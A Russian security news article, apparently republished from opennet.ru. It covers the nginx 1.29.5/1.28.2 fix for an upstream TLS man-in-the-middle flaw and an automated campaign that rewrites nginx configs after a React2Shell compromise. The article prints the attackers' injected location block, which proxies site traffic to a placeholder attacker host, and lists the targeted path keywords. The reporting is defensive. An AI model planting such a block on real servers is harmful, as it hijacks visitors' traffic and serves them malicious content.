Nginx 1.29.4 с устранСниСм уязвимости. Атаки, ΠΌΠ΅Π½ΡΡŽΡ‰ΠΈΠ΅ настройки nginx для пСрСнаправлСния Ρ‚Ρ€Π°Ρ„ΠΈΠΊΠ°

Π‘Ρ„ΠΎΡ€ΠΌΠΈΡ€ΠΎΠ²Π°Π½ выпуск основной Π²Π΅Ρ‚ΠΊΠΈ nginx 1.29.5, Π² Ρ€Π°ΠΌΠΊΠ°Ρ… ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ продолТаСтся Ρ€Π°Π·Π²ΠΈΡ‚ΠΈΠ΅ Π½ΠΎΠ²Ρ‹Ρ… возмоТностСй, Π° Ρ‚Π°ΠΊΠΆΠ΅ выпуск ΠΏΠ°Ρ€Π°Π»Π»Π΅Π»ΡŒΠ½ΠΎ ΠΏΠΎΠ΄Π΄Π΅Ρ€ΠΆΠΈΠ²Π°Π΅ΠΌΠΎΠΉ ΡΡ‚Π°Π±ΠΈΠ»ΡŒΠ½ΠΎΠΉ Π²Π΅Ρ‚ΠΊΠΈ nginx 1.28.2, Π² ΠΊΠΎΡ‚ΠΎΡ€ΡƒΡŽ вносятся Ρ‚ΠΎΠ»ΡŒΠΊΠΎ измСнСния, связанныС с устранСниСм ΡΠ΅Ρ€ΡŒΡ‘Π·Π½Ρ‹Ρ… ошибок ΠΈ уязвимостСй. Π’ обновлСниях устранСна ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ (CVE-2026-1642), ΠΏΠΎΠ·Π²ΠΎΠ»ΡΡŽΡ‰Π°Ρ Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰Π΅ΠΌΡƒ, ΠΈΠΌΠ΅ΡŽΡ‰Π΅ΠΌΡƒ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ Π²ΠΊΠ»ΠΈΠ½ΠΈΡ‚ΡŒΡΡ (MITM) Π² ΠΊΠ°Π½Π°Π» связи ΠΌΠ΅ΠΆΠ΄Ρƒ nginx ΠΈ upstream-сСрвСром, ΠΏΠΎΠ΄ΡΡ‚Π°Π²ΠΈΡ‚ΡŒ отправляСмыС ΠΊΠ»ΠΈΠ΅Π½Ρ‚Ρƒ ΠΎΡ‚Π²Π΅Ρ‚Ρ‹. ΠŸΡ€ΠΎΠ±Π»Π΅ΠΌΠ° Π·Π°Ρ‚Ρ€Π°Π³ΠΈΠ²Π°Π΅Ρ‚ ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΠΈ, ΠΏΡ€ΠΎΠΊΡΠΈΡ€ΡƒΡŽΡ‰ΠΈΠ΅ запросы (HTTP 1.x, HTTP/2, gRPC ΠΈΠ»ΠΈ uWSGI) ΠΊ Π²Ρ‹ΡˆΠ΅ΡΡ‚ΠΎΡΡ‰Π΅ΠΌΡƒ сСрвСру с использованиСм TLS-ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΡ.

Помимо уязвимости Π² выпускС 1.29.5 сниТСн с Β«critΒ» Π΄ΠΎ Β«infoΒ» ΡƒΡ€ΠΎΠ²Π΅Π½ΡŒ логгирования SSL-ошибок Β«ech_requiredΒ», Π° Ρ‚Π°ΠΊΠΆΠ΅ устранСно нСсколько ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌ: устранСно ΠΎΠ±Ρ€Π°Ρ‰Π΅Π½ΠΈΠ΅ ΠΊ ΡƒΠΆΠ΅ освобоТдённой памяти (use-after-free) послС ΠΏΠ΅Ρ€Π΅ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΡ Π½Π° ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΉ бэкСнд gRPC ΠΈΠ»ΠΈ HTTP/2; Ρ€Π΅ΡˆΠ΅Π½Π° ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΠ° с ΠΎΡ‚ΠΏΡ€Π°Π²ΠΊΠΎΠΉ Π½Π΅ΠΊΠΎΡ€Ρ€Π΅ΠΊΡ‚Π½ΠΎΠ³ΠΎ запроса HTTP/2 послС ΠΏΠ΅Ρ€Π΅ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΡ Π½Π° ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΉ upstream-сСрвСр; исправлСно разрастаниС Ρ€Π°Π·ΠΌΠ΅Ρ€Π° ΠΎΡ‚Π²Π΅Ρ‚Π° с нСсколькими Π΄ΠΈΠ°ΠΏΠ°Π·ΠΎΠ½Π°ΠΌΠΈ; Π½Π°Π»Π°ΠΆΠ΅Π½ΠΎ выставлСниС ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½ΠΎΠΉ HTTP_HOST ΠΏΡ€ΠΈ проксировании ΠΊ бэкСндам FastCGI, SCGI ΠΈ uwsgi.

Π”ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ ΠΌΠΎΠΆΠ½ΠΎ ΠΎΡ‚ΠΌΠ΅Ρ‚ΠΈΡ‚ΡŒ выявлСниС Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΠ·ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎΠΉ Π°Ρ‚Π°ΠΊΠΈ, которая послС ΡƒΡΠΏΠ΅ΡˆΠ½ΠΎΠ³ΠΎ Π²Π·Π»ΠΎΠΌΠ° сСрвСров ограничиваСтся ΠΈΠ·ΠΌΠ΅Π½Π΅Π½ΠΈΠ΅ΠΌ ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΠΈ nginx. Π’Π·Π»ΠΎΠΌ осущСствляСтся Ρ‡Π΅Ρ€Π΅Π· Π½Π΅ΠΈΡΠΏΡ€Π°Π²Π»Π΅Π½Π½ΡƒΡŽ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ React2Shell Π² сСрвСрных ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚Π°Ρ… React Π½Π° систСмах с панСлями управлСния хостингом, Ρ‚Π°ΠΊΠΈΠΌΠΈ ΠΊΠ°ΠΊ Baota (BT). ВносимыС Π² ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΡŽ nginx измСнСния пСрСнаправляли запросы ΠΊ обслуТиваСмым сайтам Π½Π° сСрвСр Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΡ…, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ осущСствлял подстановку врСдоносных ΠΈΠ·ΠΌΠ΅Π½Π΅Π½ΠΈΠΉ Π² Π²ΠΎΠ·Π²Ρ€Π°Ρ‰Π°Π΅ΠΌΡ‹ΠΉ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŽ ΠΎΡ‚Π²Π΅Ρ‚. location /%PATH%/ { set $fullurl Β«$scheme://$host$request_uriΒ»; rewrite ^/%PATH%/?(.*)$ /index.php?domain=$fullurl&$args break; proxy_set_header Host [Attacker_Domain]; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; proxy_set_header User-Agent $http_user_agent; proxy_set_header Referer $http_referer; proxy_ssl_server_name on; proxy_pass http://[Attacker_Domain]; }

Π’Π°ΠΊΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ вмСсто установки Ρ€ΡƒΡ‚ΠΊΠΈΡ‚ΠΎΠ² ΠΈΠ»ΠΈ врСдоносного ПО Π½Π° сСрвСр, ΠΎΡ€Π³Π°Π½ΠΈΠ·ΠΎΠ²Π°Π½Π° Π°Ρ‚Π°ΠΊΠ° Π½Π° ΠΊΠ»ΠΈΠ΅Π½Ρ‚ΠΎΠ², ΠΎΡ‚ΠΊΡ€Ρ‹Π²Π°ΡŽΡ‰ΠΈΡ… обслуТиваСмый Π½Π° сСрвСрС сайт, Π±Π΅Π· нСпосрСдствСнного измСнСния ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚ΠΎΠ² сайта Π½Π° сСрвСрС. Атака Π² основном Π½Π°Ρ†Π΅Π»Π΅Π½Π° Π½Π° ΠΏΠ΅Ρ€Π΅Ρ…Π²Π°Ρ‚ Ρ‚Ρ€Π°Ρ„ΠΈΠΊΠ° Π΄ΠΎΠΌΠ΅Π½ΠΎΠ² азиатских стран, Π° Ρ‚Π°ΠΊΠΆΠ΅ Π΄ΠΎΠΌΠ΅Π½ΠΎΠ² *.edu ΠΈ *.gov. Π§Π΅Ρ€Π΅Π· сСрвСр Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΡ… ΠΏΠ΅Ρ€Π΅Π½Π°ΠΏΡ€Π°Π²Π»ΡΡŽΡ‚ΡΡ Π²Ρ‹Π±ΠΎΡ€ΠΎΡ‡Π½Ρ‹Π΅ запросы, Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, содСрТащиС Π² путях слова Β«pgΒ», Β«pgslotΒ», Β«slotΒ», Β«gameΒ», Β«casinoΒ», Β«liveΒ», Β«helpΒ», Β«newsΒ», Β«pageΒ», Β«blogΒ», Β«aboutΒ», Β«supportΒ» ΠΈ Β«infoΒ». Атака производится Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΠ·ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎ с использованиСм инструмСнтария, Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡŽΡ‰Π΅Π³ΠΎ поиск ΠΈ Π°Π½Π°Π»ΠΈΠ· ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΠΈ nginx, Π²Ρ‹Π±ΠΎΡ€ ΠΈ подстановку шаблона настроСк, пСрСзапуск nginx ΠΈ ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΡƒ Ρ€Π°Π±ΠΎΡ‚Ρ‹ ΠΈΠ·ΠΌΠ΅Π½Ρ‘Π½Π½ΠΎΠ³ΠΎ Π²Π°Ρ€ΠΈΠ°Π½Ρ‚Π°.

 Nginx 1.29.4 с устранСниСм уязвимости. Атаки, ΠΌΠ΅Π½ΡΡŽΡ‰ΠΈΠ΅ настройки nginx для пСрСнаправлСния Ρ‚Ρ€Π°Ρ„ΠΈΠΊΠ°


Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ: opennet.ru
author avatar
Erik Peterson Π Π΅Π΄Π°ΠΊΡ‚ΠΎΡ€, ΠœΠ΅Π½Π΅Π΄ΠΆΠ΅Ρ€
A ProHoster specialist with over seven years of experience in hosting, network infrastructure, and internet security. I participate in the development and maintenance of server solutions, VPN services, and client platforms. I specialize in stability, data protection, and service optimization for clients. I regularly monitor updates in industry standards and best practices.

Π”ΠΎΠ±Π°Π²ΠΈΡ‚ΡŒ ΠΊΠΎΠΌΠΌΠ΅Π½Ρ‚Π°Ρ€ΠΈΠΉ